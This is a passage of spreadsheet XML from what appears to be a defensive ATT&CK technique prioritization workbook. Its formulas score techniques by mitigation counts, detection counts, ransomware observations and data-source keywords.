        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC175" s="29" t="s">
        <v>785</v>
      </c>
      <c r="AD175" s="25" t="str" cm="1">
        <f t="array" ref="AD175">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC175)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE175" s="25">
        <f>IF(AD175="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF175" s="25" t="str" cm="1">
        <f t="array" ref="AF175">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC175)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG175" s="25">
        <f>IF(AF175="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH175" s="25" t="str" cm="1">
        <f t="array" ref="AH175">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC175)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI175" s="25">
        <f>IF(AH175="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ175" s="25" t="str" cm="1">
        <f t="array" ref="AJ175">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC175)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK175" s="25">
        <f>IF(AJ175="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL175" s="25" t="str" cm="1">
        <f t="array" ref="AL175">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC175)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM175" s="25">
        <f>IF(AL175="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN175" s="52">
        <v>0</v>
      </c>
      <c r="AO175" s="51">
        <v>0</v>
      </c>
      <c r="AP175" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.2566666666666671E-2</v>
      </c>
      <c r="AQ175" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.17522222222222225</v>
      </c>
      <c r="AR175" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.17522222222222225</v>
      </c>
      <c r="AS175" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT175" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU17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76" spans="1:47" ht="32.1">
      <c r="A176" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.4633333333333338E-2</v>
      </c>
      <c r="B176" s="25">
        <f>SUM(H176,M176,V176)*(1+SUM(AE176,AG176,AI176,AK176,AM176))</f>
        <v>0.51300000000000001</v>
      </c>
      <c r="C176" s="25" t="s">
        <v>786</v>
      </c>
      <c r="D176" s="25" t="s">
        <v>165</v>
      </c>
      <c r="E176" s="25" t="s">
        <v>787</v>
      </c>
      <c r="F176" s="51">
        <v>1</v>
      </c>
      <c r="G176" s="51">
        <v>1</v>
      </c>
      <c r="H176" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I176">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J176">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K176">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L176">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M176" s="25">
        <v>0</v>
      </c>
      <c r="N176" s="51">
        <v>0</v>
      </c>
      <c r="O176" s="51">
        <v>0</v>
      </c>
      <c r="P176" s="51">
        <v>0</v>
      </c>
      <c r="Q176" s="51">
        <v>0</v>
      </c>
      <c r="R176" s="53" t="s">
        <v>788</v>
      </c>
      <c r="S176" s="51">
        <v>15</v>
      </c>
      <c r="T176" s="51" t="s">
        <v>789</v>
      </c>
      <c r="U176" s="51">
        <v>15</v>
      </c>
      <c r="V176" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="W176">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>30</v>
      </c>
      <c r="X176">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.54545454545454541</v>
      </c>
      <c r="Y176">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.54545454545454541</v>
      </c>
      <c r="Z176">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA176">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB176">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC176" s="29" t="s">
        <v>653</v>
      </c>
      <c r="AD176" s="25" t="str" cm="1">
        <f t="array" ref="AD176">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC176)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE176" s="25">
        <f>IF(AD176="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF176" s="25" t="str" cm="1">
        <f t="array" ref="AF176">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC176)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG176" s="25">
        <f>IF(AF176="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH176" s="25" t="str" cm="1">
        <f t="array" ref="AH176">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC176)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI176" s="25">
        <f>IF(AH176="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ176" s="25" t="str" cm="1">
        <f t="array" ref="AJ176">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC176)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK176" s="25">
        <f>IF(AJ176="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL176" s="25" t="str" cm="1">
        <f t="array" ref="AL176">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC176)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM176" s="25">
        <f>IF(AL176="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN176" s="58">
        <v>1</v>
      </c>
      <c r="AO176" s="51">
        <v>1</v>
      </c>
      <c r="AP176" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.4633333333333338E-2</v>
      </c>
      <c r="AQ176" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.17100000000000001</v>
      </c>
      <c r="AR176" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.17100000000000001</v>
      </c>
      <c r="AS176" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT176" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU17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77" spans="1:47" ht="63.95">
      <c r="A177" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.1300000000000005E-2</v>
      </c>
      <c r="B177" s="25">
        <f>SUM(H177,M177,V177)*(1+SUM(AE177,AG177,AI177,AK177,AM177))</f>
        <v>0.51300000000000001</v>
      </c>
      <c r="C177" s="25" t="s">
        <v>790</v>
      </c>
      <c r="D177" s="25" t="s">
        <v>94</v>
      </c>
      <c r="E177" s="25" t="s">
        <v>791</v>
      </c>
      <c r="F177" s="51">
        <v>1</v>
      </c>
      <c r="G177" s="51">
        <v>1</v>
      </c>
      <c r="H177" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I177">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J177">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K177">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L177">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M177" s="25">
        <v>0</v>
      </c>
      <c r="N177" s="51">
        <v>0</v>
      </c>
      <c r="O177" s="51">
        <v>0</v>
      </c>
      <c r="P177" s="51">
        <v>0</v>
      </c>
      <c r="Q177" s="51">
        <v>0</v>
      </c>
      <c r="R177" s="52" t="s">
        <v>792</v>
      </c>
      <c r="S177" s="51">
        <v>14</v>
      </c>
      <c r="T177" s="52" t="s">
        <v>793</v>
      </c>
      <c r="U177" s="51">
        <v>16</v>
      </c>
      <c r="V177" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="W177">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>30</v>
      </c>
      <c r="X177">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.54545454545454541</v>
      </c>
      <c r="Y177">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.54545454545454541</v>
      </c>
      <c r="Z177">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA177">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB177">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC177" s="29" t="s">
        <v>794</v>
      </c>
      <c r="AD177" s="25" t="str" cm="1">
        <f t="array" ref="AD177">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC177)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE177" s="25">
        <f>IF(AD177="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF177" s="25" t="str" cm="1">
        <f t="array" ref="AF177">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC177)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG177" s="25">
        <f>IF(AF177="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH177" s="25" t="str" cm="1">
        <f t="array" ref="AH177">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC177)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI177" s="25">
        <f>IF(AH177="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ177" s="25" t="str" cm="1">
        <f t="array" ref="AJ177">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC177)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK177" s="25">
        <f>IF(AJ177="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL177" s="25" t="str" cm="1">
        <f t="array" ref="AL177">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC177)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM177" s="25">
        <f>IF(AL177="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN177" s="52">
        <v>0</v>
      </c>
      <c r="AO177" s="51">
        <v>0</v>
      </c>
      <c r="AP177" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.1300000000000005E-2</v>
      </c>
      <c r="AQ177" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.17100000000000001</v>
      </c>
      <c r="AR177" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.17100000000000001</v>
      </c>
      <c r="AS177" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT177" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU17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78" spans="1:47" ht="48">
      <c r="A178" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.6457142857142862E-2</v>
      </c>
      <c r="B178" s="25">
        <f>SUM(H178,M178,V178)*(1+SUM(AE178,AG178,AI178,AK178,AM178))</f>
        <v>0.43123809523809525</v>
      </c>
      <c r="C178" s="25" t="s">
        <v>795</v>
      </c>
      <c r="D178" s="25" t="s">
        <v>197</v>
      </c>
      <c r="E178" s="25" t="s">
        <v>796</v>
      </c>
      <c r="F178" s="51">
        <v>1</v>
      </c>
      <c r="G178" s="51">
        <v>1</v>
      </c>
      <c r="H178" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I178">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J178">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K178">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L178">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M178" s="25">
        <v>0</v>
      </c>
      <c r="N178" s="51">
        <v>0</v>
      </c>
      <c r="O178" s="51">
        <v>7</v>
      </c>
      <c r="P178" s="51">
        <v>0</v>
      </c>
      <c r="Q178" s="51">
        <v>0</v>
      </c>
      <c r="R178" s="52" t="s">
        <v>797</v>
      </c>
      <c r="S178" s="51">
        <v>10</v>
      </c>
      <c r="T178" s="51" t="s">
        <v>798</v>
      </c>
      <c r="U178" s="51">
        <v>16</v>
      </c>
      <c r="V178" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.28095238095238095</v>
      </c>
      <c r="W178">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>26</v>
      </c>
      <c r="X178">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.47272727272727272</v>
      </c>
      <c r="Y178">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.47272727272727272</v>
      </c>
      <c r="Z178">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>7</v>
      </c>
      <c r="AA178">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB178">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC178" s="29" t="s">
        <v>799</v>
      </c>
      <c r="AD178" s="25" t="str" cm="1">
        <f t="array" ref="AD178">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC178)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE178" s="25">
        <f>IF(AD178="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF178" s="25" t="str" cm="1">
        <f t="array" ref="AF178">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC178)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG178" s="25">
        <f>IF(AF178="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH178" s="25" t="str" cm="1">
        <f t="array" ref="AH178">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC178)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI178" s="25">
        <f>IF(AH178="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ178" s="25" t="str" cm="1">
        <f t="array" ref="AJ178">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC178)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK178" s="25">
        <f>IF(AJ178="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL178" s="25" t="str" cm="1">
        <f t="array" ref="AL178">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC178)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM178" s="25">
        <f>IF(AL178="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN178" s="61">
        <v>1</v>
      </c>
      <c r="AO178" s="51">
        <v>1</v>
      </c>
      <c r="AP178" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.6457142857142862E-2</v>
      </c>
      <c r="AQ178" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.14374603174603176</v>
      </c>
      <c r="AR178" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.14374603174603176</v>
      </c>
      <c r="AS178" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT178" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU17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79" spans="1:47">
      <c r="A179" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.5067619047619044E-2</v>
      </c>
      <c r="B179" s="25">
        <f>SUM(H179,M179,V179)*(1+SUM(AE179,AG179,AI179,AK179,AM179))</f>
        <v>0.45067619047619045</v>
      </c>
      <c r="C179" s="25" t="s">
        <v>800</v>
      </c>
      <c r="D179" s="25" t="s">
        <v>396</v>
      </c>
      <c r="E179" s="25" t="s">
        <v>801</v>
      </c>
      <c r="F179" s="51">
        <v>1</v>
      </c>
      <c r="G179" s="51">
        <v>1</v>
      </c>
      <c r="H179" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I179">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J179">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K179">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L179">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M179" s="25">
        <v>0</v>
      </c>
      <c r="N179" s="51">
        <v>0</v>
      </c>
      <c r="O179" s="51">
        <v>8</v>
      </c>
      <c r="P179" s="51">
        <v>0</v>
      </c>
      <c r="Q179" s="51">
        <v>8</v>
      </c>
      <c r="R179" s="52" t="s">
        <v>802</v>
      </c>
      <c r="S179" s="51">
        <v>7</v>
      </c>
      <c r="T179" s="51" t="s">
        <v>398</v>
      </c>
      <c r="U179" s="51">
        <v>14</v>
      </c>
      <c r="V179" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.27619047619047621</v>
      </c>
      <c r="W179">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>21</v>
      </c>
      <c r="X179">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Y179">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Z179">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>16</v>
      </c>
      <c r="AA179">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.16</v>
      </c>
      <c r="AB179">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.16</v>
      </c>
      <c r="AC179" s="29" t="s">
        <v>136</v>
      </c>
      <c r="AD179" s="25" t="str" cm="1">
        <f t="array" ref="AD179">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC179)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE179" s="25">
        <f>IF(AD179="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF179" s="25" t="str" cm="1">
        <f t="array" ref="AF179">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC179)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG179" s="25">
        <f>IF(AF179="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH179" s="25" t="str" cm="1">
        <f t="array" ref="AH179">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC179)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI179" s="25">
        <f>IF(AH179="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ179" s="25" t="str" cm="1">
        <f t="array" ref="AJ179">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC179)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK179" s="25">
        <f>IF(AJ179="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL179" s="25" t="str" cm="1">
        <f t="array" ref="AL179">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC179)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
